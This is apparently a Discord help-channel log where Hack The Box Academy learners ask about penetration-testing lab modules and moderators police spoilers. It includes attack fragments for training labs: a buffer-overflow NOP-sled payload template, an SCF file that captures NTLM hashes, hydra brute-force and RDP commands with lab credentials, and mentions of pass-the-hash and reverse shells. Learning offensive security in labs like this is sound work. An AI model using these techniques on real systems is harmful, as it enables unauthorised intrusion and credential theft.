@storm shard don't reveal payloads used on modules above tier 0; i've been letting some stuff slide. if someone has the answer to help you they can ask to dm

oh yeah it is t0

well let me double check now lol

Glad I'm not the only one to make that mistake

I think it's 0

but revealing potential commands that result in answers is still iffy

as someone can just copy/paste your command without actually having learned a god damn thing

https://tenor.com/view/jake-adventure-time-sucking-sort-of-good-gif-22475109

Yes it is lol

No i get it, the point is to learn and giving the answer ruins it

@sand rose there's a reason i keep this gif on standby

I hate that this is the way.

nxc worked Hare Krishna!

Would be pretty boring if we just all innately good at everything

Sucking at something and learning is how I got into tech lol... Arch killed my laptop and I spent four days fixing it xD

i'm learning js/ts and am failing miserably (learning via the game BitBurner) because i learned i need to account for Out of Bounds errors, like results returning -1; or if it's very large it just says "alright, it's infinity now"

luckily they have a discord which massively helped me understand where i was going wrong

and even how to optimize the things that i knew what i needed to do.

I think nxc is becoming my most used tool. It's worth taking a read of their docs to learn what else can be done with it.

there's often a thing (especially with coding) that you know what you need to do, but discovering how to do it is something else

The web proxies burp intruder question is gonna take 40hrs or sthing, does anyone know the flag?

web proxies module

i.e. you know you need to read /root/root.txt or C:/users/administrator/root.txt

we don't share flags here

😢

also it won't take the full 40 hours; if the module told you to reduce the list used, do that

sans

and sometimes the answer is near the top of the list, let it run for a minute, then sort by response size

You're asking for sans?

There's also Ncrack, do you ever use that?

Is it okay to share my notes on this stack overflow then? Just to see how it's going?

if it reveals module contents for a module above tier 0; no

@fathom pendant Also: I'm not getting any response in the support (at least live). Before I send a Ticket through email, do you have any other ideas for troubleshooting steps with connecting up to the module? (Sorry to bug you again).

kk

support generally is gonna be slower around this time due to them generally being UK timezone

You will only get told to go to support with a ticket if you email in

They will get back to you, but yeah.. we can't give instant responses 24/7 I'm afraid

I hate that! You think that brute-forcing with a trillion-word list like rockyou is going to take a zillion years, so you don't bother, then find out that the word was there after all, right near the top.

hire me and i'll work 24/7/365 for 1 morbillion dollars

That's understandable. I don't expect it either. I'm just impatient and trying to exhaust other options before sending a response that may take a day or 2. (Again, I know you guys are busy... It's me being impatient).

the general (rare cases where it isn't) rule of thumb is: if it takes > 30 minutes you're doing something wrong (even less for boxes on the main site)

note this doesn't translate outside of learning environments

and using premade lists on live sites generally won't get you anywhere

Hello im new and want to learn how to hack in a good way.
Can anyone help me?
If so dm me

I saw on a box that IPPSec (after enumerating users in an AD Environment) went through a process to generate his own wordlist based on policies and other info he was able to enumerat... is this kind of approach typically more used/practical in real world?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

^

free?

yes

htb academy isn't free, and stuff you find on academy can be found elsewhere in medium articles and such that are free

Well... there is free content

but it's not 100% free

obvs

the benefit of academy is that it's aggregated into a nice format with targets you can safely hack away at without accidentally taking down someone's infrastructure

is their any 100% free stuff i can use im compleatly new and want to learn i only know visual basic

knowing VB really isn't that helpful tbqh

ik

but as i said you'll have to google to find completely free stuff

what do i go to

plenty of medium articles on plenty of topics

like what do i download

I haven't used ncrack. Seems like it might be faster for what it does compared to nxc. However, nxc has so many more things that it can do.

i believe TryHackMe is also free

@bronze frigate I started from 0 about a year and a half ago. I'm not sure the extent of your computer knowledge, but I highly recommend getting familiar with networking and security principles first a bit. I know HTB has a IT Foundations Module and a Networking Basics module.... start there probably is best I'd imagine

and they offer a more hand-holding approach if you need the extra nudge

HTB is hands-off approach, at least with the active labs on https://app.hackthebox.com where you're given an IP and just told to find the user and root.txt files on a machine

all my computer knowlage is Visual Basic

that doesn't tell us anything; but this is veering off-topic of HTB academy

if you want access to #general and other channels then i suggest reading and following #welcome

do i have to be a certain age?

I would start with the IT Foundations module. While not academy, Starting Point I think is a great way to get your feet wet as a beginner. Best of luck!

18+; 13+ with parental consent

ohhh

dang

this is due to data collection laws that HTB has to follow

Is it okay to turn my payload into just nopsled + shellcode + address?

and other legal reasons

will i learn enough with the free version

What are the tags to enclose a semi long bit of text so that it collapses?

three backticks right?

from my experience you get out proportionally as much as you put in

yeah

well with the free account on the main site you can access all active content; and there's sets of machines called "starting-point" that have walkthroughs and go through basics (note the guides may be outdated) and there's also some retired easy and medium machines that have a guided mode to learn from

Damn it was too big or somethin

@storm shard try trimming the output

instead of uploading the full output

Can I dm someone? That is the short version xD

why does it want so much info abt me

I added comments to make it less garbagey

it's the same info that most companies like this will ask for, you can give it bogus info if you want

also whats a good username?

I could make a copy and snip the long bits? if thats okay and shorten the comments. one min

your one on discord is fine if it's not already taken on the site ¯_(ツ)_/¯

it wont let me in

it doesnt even give me an option it just says must be over 18

That one wont even collapse now

Which module was this for again?

I probably have to go to support, but may I dm either @fathom pendant or @ocean night if they are able about something brief?

i'm not staff

Aha, maybe just this ```// Make a nop sled and pick an address in the middle for the eip to drop in
$(python -c 'print "\x90" * (2064 - 452 - 4) + "<SNIP>" + "\x77" * 4')

// Choosing address: 0xffffd5cc
// Little endian "\xcc\xd5\xff\xff"

// Updating for eip - NOP + shellcode + 0xffffd5cc
$(python -c 'print "\x90" * (2064 - 452 - 4) + "<SNIP>" + "\xcc\xd5\xff\xff"')```

I'm not here for support, sorry

Sometimes I do support, but it's last midnight for me

Past*

also; generally staff that are currently active on the dc are trying to separate work from discord (support people don't get paid to monitor the discord)

Noted. I assumed some were here for some work related purpose. Sorry about that, sincerely.

sometimes they do respond to help in the dc; however: that's the exception not the rule.

but they will ask that you have a support ticket open and chat will be moved to the support ticket

Why are you posting that if it's related to the answer on the module you were talking about earlier @storm shard ?

It's tier 0 but I can delete it, I just can't seem to figure out what's wrong and wanted to see if someone could see anything obvious

Oh fml

Is that not good to post?

No never mind, mixed up again. Good night.

lol you're good

I usually pass out around 10 these days

Okay, I have had somewhat of a breakthrough. I am so annoyed with myself.

... the number of bytes is not 425 -_-

I am getting code execution. Which feels wonderful, but there are permission errors for /bin/dash and for cat /root/flag.txt

well

/bin/dash isn't at thing, so

the debian almquist shell

from a google search

for the purposes of the excersize that's irrelevant

why might I not be able to visit a target address?

I got it. I am a wizard and a genius

lol

using https instead of http

its a blank page

yep

try using http instead

it's relevant if they want to work in a different shell

i have

are you running a proxy?

did you try turning it off and then on again?

Everything, as always, came down to small mistakes that were hard to notice in the big picture.

can i not visit if proxy/burpsuite is running???

i am on a different tab to look for it

is intercept on for burp? Might have to either forward the packets or momentarily turn it off?

kk

nahh turned off and http but just white space

This for a specific module/lab?

Web Proxies

@slender phoenix Have you been able to connect to the page at all? You also might need to edit your /etc/hosts file too?

Oh, this guy knows more than me, he can take the reigns

Are you connected to burp proxy on your browser?

in the instance

Is burp intercept off?

uhuh

Can you try curl and see if there's meant to be some output

Or a different browser

which section specifically? I can try to look at it myself too. I know you said the module is web proxies.

can't connect to server

which section exactly is it in the module?

Im going to try to connect up to it

Is this connected with an academy openvpn instance?

Are you including the port in the URL you're visiting?

yes

Bc I've often accidentally opened more than one so I do a killall and reopen one and make sure its connected.

yes

Is it a public ip? Can you send target ip?

Are you accessing the page from your host computer, VM, or the pwnbox?

yeah

host and pwn

sudo killall openvpn && sudo openvpn name.ovpn

sorry no

http://94.237.55.112:50927/

which section are you on?

Looks like a docker ip to me(afaik are public)... but cant access it either

does it matter that i'm doing an attack? Like intercept might

need to know the section

@slender phoenix I just went to the first section I could spawn a target... I was able to connect up fine. Try refreshing the target?

probably just restart the target at this point though

cool

right so it is intruder

can't really tell without knowing the section

the question

there are many questions in each section of the module, we need to know which section you're on

What is the question you're trying to answer?

under the table of contents

right so it is intruder

do you mean "Burp Intruder" section?

yeah section intruder

ok yeah, you're not going to get anything but a blank page on the root of the server. the instructions tell you to fuzz for the html file in the /admin directory.

i have, i know the file name? i think

you said root? i dunno

but i have the file

@ruby storm please post again without posting content from the module itself as it's above tier 0

Hello guys, im a little stuck in the Cracking Passwords with Hashcat module on section Cracking Common Hashes im given ahash that i need to crack and the hint is suggesting to use hybrid attack ore one of the default rules, any insight on wich rule to use or any other hint 😄

the causeeee....

yo im on cpts footprinting imap/pop3 section

im stuck on the last 2 question and i though the admin email was cto1... i checked but it wasnt and im confused on what else it would be and for the last one idk how to log into imap w/o a password

any one able to guide me ?

iirc checking all mails body was helpful in this exercise

what does iirc

If i recall correctly

how do i check a mails body

also wtf is the admin domain if its not cto..

and why dont my commands work in impac

The commands are covered in the section you are currently on @unique spruce, although you may need to do some reading on the steps outlined in the section.

If you are unsure on something, look at what you have learned, and look at documentation / man entries

A FETCH 1 BODY[]

something or other

dont worry man im about to punch my monitor because i didnt read the last sentence

that gave the credentials

ive spent an hour learning how to use hydra to brute force usernames

Yeah that part got me too

atleast im learning hydra early

any idea why after ur encoding and i search in the browser it replaces alot of the url encoding with dots and back to the ascii values

cos that's what browsers do...

its one of the exercises that tells to url encode and search

and i need to bypass the filters by the web app so i have to url encode

If this is part of a module I probably haven't done it

local file inclusions

Definitely haven't done it but you can probably try curl --path-as-is or something like that

nvm

it worked anw

it's the dash

Jajaja thanks

there's prolly something wrong with (ACADEMY-PWATTACKS-LM-MS01) in password attacks module, i cant seem to rdp in with the correct creds
The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
Please look at the OpenSSL documentation on how to add a private CA to the store.
Do you trust the above certificate? (Y/T/N) Y
[22:28:49:949] [8600:8601] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[22:28:49:949] [8600:8601] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[22:28:49:949] [8600:8601] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[22:28:49:949] [8600:8601] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1

module and section?

Password Attacks
Pass the Ticket (PtT) from Windows
https://academy.hackthebox.com/module/147/section/1639

did you wrap the password in single quotes?

xfreerdp /v:10.129.204.23 /u:Administrator /p:AnotherC0mpl3xP4$$
the exact commad

try wrapping the password in single quotes as it contains special characters your terminal interprets as not part of the password.

works now, thanks

also protip for you, add /dynamic-resolution

https://tenor.com/view/spider-man-tom-holland-yoink-gif-11346283

I hate RDP but thanks for this lil piece of knowledge

protip 2: /drive:/home/<user>/Desktop

or whatever folder you want to use

hi

hello

im new

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Yoink #2 couldve been very useful when I was doing Shells&Payloads SA

i cant use this im not old enough

i use tryhackme

You can get parental consent

You still need to be a certain age though I think

yo, thanks for this

body[]

idk mate just use RFC822

(basically what body[] does)

Still think its stupid that ALL doesnt show it

because ALL grabs more of the metadata, than the actual data

Yah ik but its not intuitive

blame RFC

https://i.imgflip.com/9nzfml.gif

Hi everyone can someone give me a hint for the privesc on titanic ty all

#boxes

nvm I just found out

Hello everyone.
I need help with Cyber ​​​​Lab, I can't figure out how to do "SQL Injection".

Which module is this?

I guess bro didn't really need help

not too sure if i can ask this but im in the Introduction to Threat Hunting & Hunting With Elastic module under the Hunting For Stuxbot part,

i dont get the filter part where the query includes dns.question.name:* but in the filter it excludes it. i dont rlly get the logic :o

Uhh how do I get into #general ?

Thanks

read #welcome and follow instructions

reposting: is it just me or is it nearly impossible to have findings with a "Low" (say, below 4.0) CVSS 3.1 score?

Take the "Directory listing enabled" finding example in the Documentation & Reporting module. This is a case where no sensitive data was found in said directories.

They got it to score 4.3 (and made it a "Low" too but technically 4.3 is "Medium") I guess by marking it as Adjacent attack vector, but if I can reach the relevant site from the Internet I think it should be Network, plus a Low confidentiality impact, making it a 5.3. The best I can do is change the Environmental factor for Confidentiality Requirement to also be Low, bringing it down to 4.6... still medium, and still sounding excessive, taking attention away from more important issues

ignore cvss scores for anything that doesn't have a direct exploitable impact, context and risk matter

It is not a module, it is a lab called "Cyber".

then it's not related to htb academy read and follow #welcome to access more of the server; if it's a lab on htb (and not a #starting-point machine) ask in #boxes otherwise ask on the platform that's hosting the lab

in order to gain access to the <no-access> channels see the first point

am I the only one that did not really get SSI Injection from the Server Side Attacks module ? I though the other attacks were well explained until this one

In Windows PrivEsc, Interacting with Users. I start Responder, and get many lines like this:

[HTTP] Sending NTLM authentication request to 10.129.58.58

But nothing after that. What am I doing wrong?

Command: sudo responder -w -v -I tun0

Contents of the SCF file:

[Shell]
Command=2
IconFile=\\10.10.15.15\share\legit.ico
[Taskbar]
Command=ToggleDesktop

Ignore, I was missing the -F flag. Got the hash.

In Linux PrivEsc, Polkit section I cannot run "pkexec -u root id". I also tried to do it with PwnKit as in the section but cannot get it to work. I searched online I did not find any hints? Can anyone suggest me what should I do to Escalate Privileges?

Password Reuse / Default Password

For the initial question, it mentions to use the credentials that we got from the last module. I have a password that ends in: "ations}" (trying to not give anything away) is this the right one? I don't remember what the brute forced password was for the initial access or not - just trying to figure out if I have to run another brute force to get the same pw

it'll be for the user you got from the last section not module

the password isn't the flag from; it's literally just the user you discovered -- that's all

@fathom pendant where all peoples

please stop pinging people asking where they're at

I had a feeling, I'll just have to rerun the brute force for it - it's been a couple days since I've had the chance to work on this

this is why one of the recommendations when you discover passwords is to write that shit down

Hi everyone

Hi

Hello @ionic musk - please read and follow instructions from #welcome - this isn't #general chat so please, verify your account and talk there

yeah lol - I didn't know academy was gonna ask you to remember creds, should've known better lol

Hi, I am at the "Skills Assessment" of Broken Authentication. I solved it but I didn´t fully understand what is on going. Can I ask someone? I don´t want to spoil it. Thanks

Can anybody send link of HTB to start progress
Next time I will remeber it thanks

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Thanks

Alright. I got it. In fact, I just got a VIP subscription but unfortunately I can't start removed machines. The spawn button is disabled. Does someone can help me ?

Try logging out and back in. If that does not work - contact support via the website

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Have you connected to the lab vpn? It's usually greyed out for me until I connect up to it.

Hi, someone might help me for "HTTP Attack - TE.CL" - "Try to use what you learned in this section to exploit request smuggling to bypass the WAF and access the admin portal." please ?

Hello, I am working on the Attacking Authentication Mechanisms under web pen testing job role path and got stuck. In the challenge of Signature Exclusion Attack, it says 2 vhosts are required to solve the challenge. My questions is while using the pwnbox, how do I add these vhosts? Shouldn't they be already configured? If not, what IP address to use for these? Can somebody help me out here?

DM

DM

Anyone know where to go for some collaboration on HTB Seasons?

#1318239802931286066 if you can't access, read and follow #welcome

good morning, one question how you copy and paste in pwbox?

from outside the box to inside the box,

is not good question but 😩

anyone around finished Server Side Attacks skills assessment ? I managed to do it blind, but I still do not understand why something worked and something did not, anyone around I can DM about it ?

Hi everyone, I'm stuck in Abusing HTTP Misconfigurations
Skills Assessment - Hard lab and I need your help.

This allows you to copy texts to the PwnBox

DM

Final SA Question: Find the percentage of users with a path to GLOBAL ADMINISTRATOR. Submit the number as your answer (to two decimal points, i.e., 11.78).... some suggestions, I'm going crazy...

A cheatsheet is mentioned in the module. This cheatsheet shows you the query that calculates this number. You only need to adapt the query to Azure.

hey everyone is there anyone who can help me out with the metasploit part so the public exploit start of getting started

any module for cloud pentesting?

find -type f -name *.config -newermt 2020-03-03 -size +25k -size -28k I'm using this comand in the https://academy.hackthebox.com/module/18/section/81 module for the first question and its giving me a ton of options in any directory. Is there a specific one I should be in (directory)?

Is there a module in HTB that explains how to install Sharpview?

"Using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt'. Submit the flag found within the file."
Module: https://academy.hackthebox.com/module/167/section/1614
I am doing where /R C:\ waldo.txt and it is not working, tried C:\Users\ also..

Unless I missed it somewhere its kind of insane the Sharpview.exe isn't included as part of the Powerview/sharpview module.

thanks bro!

Need help with this odat.py script. Currently working on the "footprinting" module focusing on Oracle TNS. I am trying to run odat on my personal VM and i keep getting this "no module named crypto" error. I have done research and installed the appropriate modules incorporated with the odat service but still cannot get it to work. I can't even use it on the HTB machine either, there is a plugin associated with autorecon which I am still researching on how to use the odat plugin. any ideas?

sudo pip3 install Crypto --break-system-packages
i suggest running the install script from the module line by line instead of as one big install.sh

as the install.sh method breaks more often than it's worked

That script helped, I thought it did not at first since i was still getting the error (even when trying to call the module on its own) I did some research to double check everything was installed (grep command) but noticed that the module was all lower case, "Crypto vs crypto" and now everything works fine. lol. thank you

yeah

casing is a hell of a thing

Hello everyone, I hope you guys are doing great. I'm having issues with figuring out how to go about the Login Brute Forcing Skills Assessment Part 2.

i log into the ssh using the user and password from the Part 1 and then i try brute forcing using the passwords.txt in that login: hydra -l t***** -P passwords.txt -s 50237 ftp://83.136.249.46

im at the linux fundamentals module and at the first question i cant answer the password in the set up terminal

That bs got me too

Not sure if this makes sense this is listed as gammer-5g

Maybe deauth will work

Daer all good day

need help for this

Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Dashboard". Either create a new visualization or edit the "Failed logon attempts [Admin users only]" visualization, if it is available, so that it includes failed logon attempt data where the username field contains the keyword "admin" anywhere within it. What should you specify after user.name: in the KQL query?

Ans:- user.name: admin

however its not correct can some one help please

Found it

i got it:- admin

need to give thank you

I don’t always fuck up a lab but when I do it, it’s always almost my fault

Yo anyone wanna make a hacker server with me?

nah

that profile is unreal 💀

Yuhh

I get all huzz

But lowk

I need people to make a fucking serv eith

My mf grammar !

This is off topic, and against the rules. Please read #rules and #welcome

So, I am trying to do the windows overflow assessment, tier 0 btw, any my payload worked on a local copy in the windows VM, but I am getting errors when I try to send it to the remote port

I assumed that I only had to change the ip to the target instance, but I get OSError: [Errno 113] No route to host when I try the code that popped a revshell without any issues in the VM

Hi

In theory, I should be able to just run the exact same python exploit and it will work, no? Unless there is some extra testing that I need to go over on the actual target - but, in that case, how am I supposed to monitor the behavior of the binary?

Nvm... I reset the instance and it worked. I think it was sitting there crashed after I sent to the wrong ip at first.

When doing pentest in a nutshell module specifically trying to exploit Wordpress form , when using msfconsole It keeps saying exploit completed but no session created I tried it several times

Anyone else came across similar issue

Idk if it might be because I’m using my main machine and not the instance

Seems to work on the instance I wonder why it doesn’t work on main machine

i was getting that

u using a VM on your main?

vmware hated doing reverse connections unless the vm was set to NAT and not bridged

for your network interface

@tired bough I was using wsl kali Linux

that miiiiight be why?

Yeah I wonder what’s the technical issue behind what’s causing it tho

i was woundering if its iptables but it seems to work on like local exploits on my network

i have a home lab with a vuln machine i practice msf on and do reserch with and it works fine

but anything over the vpn with reverse connections its seems to hate

so weird

I see

I AM STILL STUCK ON THE SAME ASSESSMENT

module attacking common services in section skill asessment hard

i dont know where to go from here

in section they presented how to view linked server and which user is used to access that maybe i need to bruteforce that user

I starting to hypothesize that hack the box has bugs and technical difficulties

anyone using WSL in windows had a problem with burpsuite where when you try to intercept, send to repeater, and modify the request in a way that you have something like tryinng to push a web shell like in the file upload module, but burpsuite returns an error like connection aborted by software host and does not return the response from the server? when I change the body of the request and instead of having a web shell php I have some random text, burpsuite works normally

i thought that maybe disabling the real time protection and firewall from windows defender could work but no

Is it bugged out

Or is it just me cuz I did everything I followed and still

what is happening here

The only thing is my vpn keeps giving me a alert saying it’s connected so I don’t know if that’s the problem maybe I have to reconnect the vpn

I’m following the pentest in a nutshell module where I’m using metasploit to get information on the target when I get the meterpreter and then type shell I have this issue after only after typing in a command

wow that makes no sense

Like whisper said it could be a vpn issue I’m not going to waste time

yes i think that i had some problems like that with metasploit sometimes

most of the time the thing was that the exploit was not running successfully

Yeah I had that issue as well had to run exploit command several times before it work

but have you ever had this problem?

because this is some real shit right here

I have a ton of issues with WSL. I usually just opt for Parrot in vbox

My laptop is too old for WSL2, which might be better but I wouldn't know

that makes sense

i like wsl but this type of things make me want to destroy windows

I like it too, but I have resorted to only using it for basic things that Windows doesn't do. sed filtering lists/files for output, curl, wget, vim, git, etc. Just things that I am more comfortable in a shell with.

yes maybe i should do the same

VBox Parrot works very well and fullscreen mode feels seamless compared to my dual boot but I still can swap over to windows whenever I need to without rebooting

well what i like about wsl is that is low resource-consuming and i always have a ton of programs executing at the same time without having that much ram

maybe i could search for some type of cli based parrot on vbox

you know if that exists?

i solved the hard skill assessment of attacking common service and have some doubts

anyone ?

and there are other ways too to find the same flag .. after solving it feels like i am not 100percent understood this one

Which module is this for @empty trout ?

Oh

Common services lol

Damn it I'm blind, nvm

attacking common services

hard skill assessment

That is a Tier 2 module, so careful what you share about it

sorry for that

yeah

hi

you know how could i solve this?

I don't know - ask their support I guess? Not here as tech support, sorry

You say random text.. check protocol, http vs https, all I'll sasy right now

Yeah contact port, but while you're waiting for a response check the WSL firewall settings if any? I dont use WSL but i understand its an OS within an OS so you're gonna have firewall stuff going on there too? Prob better just to proxy thru windows... part of me wonders whats the purpose for using burp... wait WSL is just a terminal right? Did you install a DE/WM?

WSL is notorious for strange/unexplained network issues.

yeah i didnt like the experience, i found it to be cumbersome personally and a little lacking in performance unless you have a "modern" computer so i was like ok whats the point

It really shouldn't be used for anything serious.

Works fine for me, but you could argue maybe I don't use it for many things serious

at least pentesting wise

Used to be nmap wouldn't work well due to lack of raw socket access, but that was fixed in later releases with WSL2

right on. if i had to use windows regularly for a job and they wouldnt let me use linux i would prob install wsl

I love it tbh

But it does have its limits

Fact you can use the GPU without configuring passthrough or any crap like that though, for LLM training etc

Very handy

didnt know that, interesting.

Ive never seen anything like that, but a full-blown linux shell that could run in windows would be awesome without the VM overhead to support a UI

WSL has some tools to run X server that have worked, but it took some tweaking

Pretty much is WSL, but yeah. Limitations. X server works, not perfect, but nicer than on a remote VM and connecting over network

I reckon it'll continue to improve

MS changed their tune so much on dev tooling and open sourcing. It's been great to see

X server over network is so god awful, but does work

..mostly

Is this normal on the pentest plus in a nutshell module when running linpeas

I asked ChatGPT and it says it’s not so what else can I do now

I got these output but compared to what hack the box was showing I wasn’t seeing printf

@quartz sundial please repost your question without revealing contents from the module as it's above tier 0.

nooooo... I spent so long formatting this text...

Who can I contact with a question in this case?

@viral slate please repost your question without spoiling content from the module

OH

@quartz sundial you can post your question here, just don't post content from the module is all

it will be difficult..

problem accessing share

using Pass The Hash attack)

I couldn't copy my question to rewrite it 😦

if you feel like you need to post info that would spoil content ask if someone can DM you. probably at last include which question/section/module you're stuck on.

I wrote my question in Sublime and then send here))

[Wi-Fi Penetration Testing Basics - Skills Assessment]

Currently working on skills assessment second question.
For some reason, I couldn't get any handshake and number of frames are incredibly low.
What should I do in this situation?

Are you using the methods taught in the Aireplay-ng section?

Ofc, also tried to do deauth attack, but wasn't really fruitful

Oh, wait, I think I got your point

life saving

Well, for some reason, when I tried to do deauth attack before - it didn't work, but now it worked just fine. Thanks a lot!

Module: Password Attacks
Section: Pass the Hash (PtH)
Question: Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt

im kinda confused, should i connect to julio with mimikatz then on another tab open a rdp session with julio account or what exactly? im lost

From what I understand, it's not a 100% thing - it might take some doing.

Module: Working with IDS/IPS Section: Suricata Fundamentals. Enter the requested PHP page as your answer. Answer format: _.php I got an answer but it won't accept it, I've had this issue before I so I want to make sure I'm not tripping

no it must be done within the same rdp session

Hello Guys. In the Information Gathering - Web addition, Fingerprinting section, I'm having a hard time getting the CMS of app.inlanefreight.local(I did update my /etc/hosts file). I ran a nikto scan with -Tuning b, but nothing came up on it, when I looked at the webpage, I didnt see anything on there that indicated the software, and a look through the source didn't appear to have the answer. What am I missing?

nvm, I got it... I was in fact, missing something.

https://academy.hackthebox.com/module/20/section/113
Can anyone pls help me with the first question in this section as i tried all possible combinations off hybrid and rule attack with hashcat and im missing something as i cant crack the hash 😄

Are we supposed to complete the network skills asessment with the pwnbox?

You can use the pwnbox or your own VM for pretty much all of the modules, which module specifically?

Networking Fundamentals

looks like it, question 2 asks specifically for something running on the pwnbox

I was doing the last questions and then my gf came over and we went to go eat and I closed the pwnbox and I only get 1 spawn per day so I moved to vpn but alas... I think I can only answer it through the pwnbox instance since its my target

maaaaaan

dump her

Nah brah. Good women are hard to find.

exactly. no rebuttal to that.

it was only a joke!

Hello, I was wondering what steps you used? I too am stuck on this. I found the list of other users and created a list with those names and cross used them with hydra and the passwords.txt file but no luck.

big sadness though since i have been doing everything through the vpn on my own machine and now i have to wait 24 hours to finish this module 😦

oh there it is

Just buy cheapest sub

I am way too broke to do that.

Hey

Guys I'm currently reading books for hacking and I stumbled upon black hat python 2nd ed

I have basic python knowledge. But why did the book drop straight into hard stuff and the format looked weird like three ''' which made no sense can anyone guide me to a book that's better or a website with a walkthrough?

Wdym "dropped into the hard stuff"?

Functions and modules are basic python

Triple quotes are block quotes which you can use to document your code better and not have to worry about which quotes you use inside of your documentation

Breaking into stuff you don't own or have permission to break into is illegal

<@&861185840277487616>

Its just one of those scammer ppl, check account creation. The server has been flooded with them lately :/

I had someone trying to fish information out of me acting as tech support in my dms a week ago

As tech support... in a literal fucking security server 😭

Sorry, wrong person

I didn't mean to reply to you @thin parrot

@weak basin breaking into things you don't own or have authorization to access is illegal

read #rules and #welcome

sorry @thin parrot misclicked and deleted your message

no worries lol

any public server gets flooded with those bots

just the nature of public servers

Fair enough

you also get kids and illiterate folks with negative braincells that just see the word "hack" and think that it's just a server about illegal activities

asking ppl to find their ex's contact

and don't understand basics of joining any server/forum of read the god damn rules

this isn't exclusive to discord, you see it in other forums and such

i remember it way back when i used to use TeamSpeak

This isn't the answer for a question but I'll cover it up anyway... Just trying to figure out why this isn't printing any subdomains

||gobuster vhost -u http://83.136.249.46:36455 -w /home/htb-ac-1070752/Downloads/bitquark-subdomains-top100000.txt --append-domain||

I'm almost certain its the wordlist as it completed without any issues.. just printed nothing to the terminal. Assuming that means not a single subdomain was discovered relative to that wordlist.

I've never used teeamspeak discord was my first exposure to any sort of form. But that makes sense, I could see myself hopping on here at 7 years old trying to act like a cool hacker 😂

if you want something beginner friendly, maybe start with "violent python"

it's a bit old but it still gets the job done

cos to find subdomains you gonna need a domain... all you got is an ip. --append-domain takes whatever's in your --url/-u flag and adds it to the vhost header: e.g VHOST.83.136.249.46:36455 which doesn't exist...

🤦‍♂️ Thank you

if you want to use the domain you're gonna have to add it to your /etc/hosts file then use the domain in the url field instead

you need a domain to append

it doesn't automagically know

Wait but does a domain not map to some ip? I'm a bit confused because I'm pretty sure there can be virtual hosts under a webserver's vhost config and that an http header determines which page or even alternative site is retrieved..?

I'm mixing this up somehow

dns handles that

Like correspondence said, usually there's entries in a DNS server, in this case since the ip isn't in any public DNS server we have to use the /etc/hosts file to say that this IP is for this domain or /etc/resolv.conf file to specify a DNS.

OHHH ok that makes more sense thank you

im falling asleep waiting gobuster to finish

same but with hydra

Mod: Password Attacks
Sec: Password Mutations

This supposed to be taking this long? been running for 30 mins using a mutated word list with the rules and password list from the resources...

im going to lose my mind

first the target goes down earlier than expected
then the pwnbox session closes

I have to do the scan for a third time

I had loads of issues with the passwords attack modules. On some of the sections you have to use the list on the resources from the previous section. I'm sure password mutations was one of them.

I am using the resources lists... as I mentioned in the message

almost an hour now...

what I'm saying is if you go back a page and get the pw-list from resources on that page it should work once you've done the mutations with that pw-list file

The file from the resources doesn't change, it's the same file throughout the module

You would like to think so and I know it's named the same but they are diffrent. I had the same problem. Try getting the password l8st from either the next page or previous page and try again with the mutations if your commands right this will work.

they're the same files mate idk what you're on about
left: password mutation resources, right: network services resources

Oh my god one of the questions is still unanswered... it wasnt in the wordlist

Would it be wrong at this point to just search up the asnwer

eh i found the wordlist for it thats good enough

Any reason why ReconSpider returns nothing in the results.txt

ok you need to specify protocol nvm

Hey

why?

😂

1. We don't encourage account sharing in this server, especially bank accounts
2. Unrelated to the channel
3. I smell something barely legal

You having issues with paying for Academy @brisk leaf ?

very specific to ask for an indian account 😄

Mo

Mo issues at all

hey where can i ask for hints for some chall?

is there a special channel for this?

I think #challenges

@somber flax like 000xblPan said #challenges if you don't have access to the channel get verified, instructions ---> #welcome

Guys anyone worked with integrating hive and misp… if yes please DM me

has anyone done the 'Introduction to Process Injection' in 'Introduction to Windows Evasion Techniques'?

the code int he section's guide fails to spawn the calculator

thank you

it's "Getting Started", public exploits section @tranquil crystal

Can you link me to the module url

i'll check it out

https://academy.hackthebox.com/module/77/section/843

thanks

if I'm supposed to exploit services, I need to be able to scan it..so ...yea..what gives?

go to it in your browser

Simple Backup Plugin 2.7.10 for WordPress can backup and download your WordPress website and MySQL Database.

You will see this. Search for exploits for this wordpress plugin

that's what the module wants you to do

sigh ok...

You're not going to scan it. Just go to it in your browser

"Try to identify the services" my ass

just say "get the exploit from the page you spawned"

it's running a web server on that port

Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)

See, it's a web server running on that port

you're not supposed to nmap it.

you misunderstood my friend 🙂

I'm not denying that the web server is the likely path or somewhere I'd go... I just read "identify the services" and think if they're telling me that, it's a practice to doing the thing...not a statement detached from possibility

it's kind of like if you told me "Gushu, don't eat a chili dog on Wednesday"...and like...I never was planning to

http://94.237.55.96:38421/wp-login.php try here as well, you will see a wp login page

now try to hack this using public exploits using the software it shows you is running

it should be a vuln. plugin

that was my ip, but you should change to yours

http://94.237.55.96:38421/simple-backup/ read the page and it tells you that it creates a dir here for backups

https://www.rapid7.com/db/modules/auxiliary/scanner/http/wp_simple_backup_file_read/ I think the module wants you to use msfconsole and try to read the flag.txt file in /

This module exploits a directory traversal vulnerability in WordPress Plugin "Simple Backup" version 2.7.10, allowing to read arbitrary files with the web server privileges.

I hope that helps

TBF if you're given an ip and a port the first thing you'd do is to try reaching it

lol I knew it was probably web... I also know I can nc it if it's not..see whats going on

but it's telling me to look at services

https://tenor.com/view/jackie-chan-are-you-serious-gif-12820216

http is in fact a service

Heh

in my mind if I'm looking at services, I'm scanning it.... -sV and such....

